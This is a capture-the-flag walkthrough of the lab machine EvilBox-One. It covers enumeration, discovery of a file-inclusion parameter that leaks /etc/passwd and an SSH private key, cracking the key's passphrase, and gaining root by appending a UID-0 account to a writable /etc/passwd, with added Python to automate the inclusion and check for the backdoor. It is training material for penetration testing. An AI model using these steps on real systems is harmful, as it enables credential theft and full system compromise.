
OSCP - Proving Grounds - EvilBox-One

Key points

  • This is essentially a black-box test: with no clues at all you can only guess, i.e. enumerate with wordlists. Once a PHP file turns up, getting a foothold becomes much easier.
  • Even with a PHP file in hand its source is unknown, so the only thing left is to test whether it has a file inclusion vulnerability.
  • In short, when there are no leads, guessing (brute-forcing paths and parameter names) is what remains.

Walkthrough

The nmap scan shows only ports 22 and 80 open, and port 80 serves nothing but the Apache default page, so there are no leads there.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-02 12:58 UTC
Nmap scan report for 192.168.56.212
Host is up (0.0011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)
|   256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)
|_  256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works

nikto, however, adds a little: it flags a /secret/ directory, and the site also has a robots.txt.

- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.56.212
+ Target Hostname:    192.168.56.212
+ Target Port:        80
+ Start Time:         2024-12-02 12:59:17 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 5c9a9bb4d712e, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET .
+ /secret/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2024-12-02 12:59:33 (GMT0) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

robots.txt only contains `Hello H4x0r`, which does not seem useful, and there are few other leads, so brute-force /secret/ for PHP files with gobuster. This turns up evil.php, which answers 200 with an empty body (Size: 0), a hint that it expects a parameter.

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.225.212/secret/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   502,404,429,503,400
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 280]
/.htaccess.php        (Status: 403) [Size: 280]
/.htpasswd.php        (Status: 403) [Size: 280]
/.htpasswd            (Status: 403) [Size: 280]
/evil.php             (Status: 200) [Size: 0]

Next, test blindly for a file inclusion: fuzz the GET parameter name with /etc/passwd as the value and filter out the empty (size 0) responses. Exactly one name gets a different response, so the file inclusion exists and the vulnerable parameter is `command`.

C:\home\kali\Documents\OFFSEC\play\EvilBox-One> ffuf -w /usr/share/SecLists/Discovery/Web-Content/common.txt -u http://192.168.225.212/secret/evil.php?FUZZ=/etc/passwd -fs 0

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.225.212/secret/evil.php?FUZZ=/etc/passwd
 :: Wordlist         : FUZZ: /usr/share/SecLists/Discovery/Web-Content/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 0
________________________________________________

command                 [Status: 200, Size: 1398, Words: 13, Lines: 27, Duration: 448ms]
:: Progress: [4730/4730] :: Job [1/1] :: 92 req/sec :: Duration: [0:00:57] :: Errors: 0 ::

Including /etc/passwd first reveals the user mowree; including /home/mowree/.ssh/id_rsa next returns that user's private key, which can be used to log in. One caveat: if you open http://192.168.225.212/secret/evil.php?command=/home/mowree/.ssh/id_rsa in a browser, you must use "view page source" to copy the key. The rendered page collapses the line breaks, and ssh refuses a key in that form. Fetching the URL with curl and saving it straight to a file avoids the problem entirely.
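The parameter-name fuzzing and the key-retrieval caveat above, as an added Python example that is not code from the original write-up: find_lfi_param tries each candidate name with /etc/passwd as the value and matches on the passwd marker rather than filtering by response size, and looks_like_intact_private_key rejects a key whose line breaks were collapsed by a browser's rendered view. The fake_fetch responder that stands in for evil.php, the candidate names and the base URL are constructed assumptions; http_fetch is the real fetcher to swap in against a live target.

```python
"""Blind LFI parameter discovery plus a sanity check on a key pulled through it.
Added example, not code from the original write-up. The responder fake_fetch,
the candidate names and the base URL are constructed stand-ins."""
import re
import urllib.parse
import urllib.request
from typing import Callable, Iterable, Optional

PASSWD_MARKER = "root:x:0:0:"  # first line of any Linux /etc/passwd


def http_fetch(url: str, timeout: float = 10) -> str:
    """Real fetcher: GET url and return the body; any error counts as empty."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except Exception:
        return ""


def find_lfi_param(base_url: str, names: Iterable[str], fetch: Callable[[str], str],
                   target: str = "/etc/passwd", marker: str = PASSWD_MARKER) -> Optional[str]:
    """Request base_url?<name>=<target> for each candidate name and return the
    first one whose body contains the passwd marker. Matching content rather
    than response size (ffuf -fs 0) avoids false hits from error pages."""
    for name in names:
        url = base_url + "?" + urllib.parse.urlencode({name: target})
        if marker in fetch(url):
            return name
    return None


def looks_like_intact_private_key(text: str) -> bool:
    """True if the PEM kept its line structure. A browser's rendered view joins
    the lines with spaces and ssh then refuses the file; 'view source' or curl
    preserves them. Encrypted traditional PEM (Proc-Type/DEK-Info headers and a
    blank line before the base64 body) is accepted as well."""
    lines = text.strip().splitlines()
    if len(lines) < 3:
        return False
    begin = re.fullmatch(r"-----BEGIN ([A-Z ]*PRIVATE KEY)-----", lines[0])
    if not begin or lines[-1] != "-----END %s-----" % begin.group(1):
        return False
    body = lines[1:-1]
    while body and (":" in body[0] or body[0] == ""):
        body.pop(0)  # header lines such as 'Proc-Type: 4,ENCRYPTED'
    return bool(body) and all(re.fullmatch(r"[A-Za-z0-9+/=]{1,76}", b) for b in body)


# Constructed stand-in for evil.php: only ?command=<file> includes the file;
# every other parameter name yields the empty 200 seen in the gobuster output.
FAKE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
               "mowree:x:1000:1000::/home/mowree:/bin/bash\n")


def fake_fetch(url: str) -> str:
    query = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
    return FAKE_PASSWD if query.get("command") == ["/etc/passwd"] else ""


if __name__ == "__main__":
    base = "http://192.168.225.212/secret/evil.php"
    print(find_lfi_param(base, ["cmd", "file", "page", "command"], fake_fetch))
    # Against the real box, swap in http_fetch and a wordlist such as SecLists'
    # common.txt: find_lfi_param(base, open("common.txt").read().split(), http_fetch)
```

Run looks_like_intact_private_key on the saved id_rsa before spending time on ssh2john: a file that fails the check will fail in john and ssh alike.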

Trying to ssh in with the key prompts for a passphrase. The string from robots.txt does not work, so crack it with john: ssh2john converts the key into a hash and rockyou.txt yields the passphrase unicorn, which logs in successfully.

C:\home\kali\Documents\OFFSEC\play\EvilBox-One> ssh2john id_rsa >id_rsa.hash
C:\home\kali\Documents\OFFSEC\play\EvilBox-One> john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn          (id_rsa)     
1g 0:00:00:00 DONE (2024-12-02 22:35) 33.33g/s 41600p/s 41600c/s 41600C/s ramona..shirley
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
C:\home\kali\Documents\OFFSEC\play\EvilBox-One> ssh -i id_rsa mowree@192.168.225.212                        
Enter passphrase for key 'id_rsa': 
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$ 

After logging in, SUID binaries and sudo -l show nothing useful, but uploading and running linpeas.sh reveals that /etc/passwd is writable by every user.

╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root 3129 feb 10  2019 usr.bin.man
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No

All that is needed is to craft a passwd record with UID 0 and a password hash in the second field (a hash there is honoured directly, without consulting /etc/shadow), append it to /etc/passwd, and su to the new user with the chosen password to get a root shell.

mowree@EvilBoxOne:~$ openssl passwd 1234
iQPI1FVnABms.
mowree@EvilBoxOne:~$ echo "tim:iQPI1FVnABms.:0:0:root:/root:/bin/bash" >> /etc/passwd
mowree@EvilBoxOne:~$ su tim
Contraseña: 
root@EvilBoxOne:/home/mowree# cat /root/proof.txt
d8033de92c0ee15a21ae22c39b979663
root@EvilBoxOne:/home/mowree# cat local.txt
07894098e76a0de660070a673dd51a6e
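The append-a-UID-0-user step above, together with the checks a defender would run to catch it, as an added Python example that is not code from the original write-up: build_passwd_entry produces the same seven-field line as the echo command, find_uid0_accounts and find_inline_hashes flag the appended account in a passwd file, and passwd_mode_is_safe is the condition behind linpeas' "Writable passwd file?" line. SAMPLE_PASSWD is constructed, and audit_passwd_file's default path is the live /etc/passwd.

```python
"""Build the UID-0 backdoor entry and audit a passwd file for it.
Added example, not code from the original write-up. SAMPLE_PASSWD is constructed;
the appended entry mirrors the walkthrough's 'tim' line."""
import os
import stat
from typing import Dict, List

# Constructed sample; a real file carries many more system accounts.
SAMPLE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
                 "mowree:x:1000:1000::/home/mowree:/bin/bash\n")


def build_passwd_entry(user: str, pw_hash: str, uid: int = 0, gid: int = 0,
                       gecos: str = "root", home: str = "/root",
                       shell: str = "/bin/bash") -> str:
    """Seven colon-separated fields. A hash in field 2 is honoured directly by
    su/login, bypassing /etc/shadow, which is what makes a writable passwd fatal."""
    return ":".join([user, pw_hash, str(uid), str(gid), gecos, home, shell])


def parse_passwd(text: str) -> List[List[str]]:
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            rows.append(line.split(":"))
    return rows


def find_uid0_accounts(text: str) -> List[str]:
    """Every login with UID 0 is root-equivalent, whatever it is called."""
    return [r[0] for r in parse_passwd(text) if len(r) >= 3 and r[2] == "0"]


def find_inline_hashes(text: str) -> List[str]:
    """Accounts whose password field holds a hash instead of 'x' (shadowed)
    or a locked marker such as '*' or '!'."""
    return [r[0] for r in parse_passwd(text)
            if len(r) >= 2 and r[1] not in ("x", "") and not r[1].startswith(("*", "!"))]


def passwd_mode_is_safe(st_mode: int, st_uid: int) -> bool:
    """/etc/passwd should be owned by root and writable by root only (0644)."""
    return st_uid == 0 and not (st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_passwd_file(path: str = "/etc/passwd") -> Dict[str, object]:
    """Run all three checks against a real file; linpeas' 'Writable passwd
    file?' finding corresponds to mode_ok being False."""
    st = os.stat(path)
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return {"mode_ok": passwd_mode_is_safe(st.st_mode, st.st_uid),
            "uid0": find_uid0_accounts(text),
            "inline_hashes": find_inline_hashes(text)}


if __name__ == "__main__":
    backdoor = build_passwd_entry("tim", "iQPI1FVnABms.")  # hash from: openssl passwd 1234
    tampered = SAMPLE_PASSWD + backdoor + "\n"
    print(find_uid0_accounts(tampered))   # ['root', 'tim']
    print(find_inline_hashes(tampered))   # ['tim']
```

On a clean Debian host audit_passwd_file() returns mode_ok True, uid0 ['root'] and no inline hashes; either extra list entry, or a False mode_ok, is the condition this box was built around.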

 

 
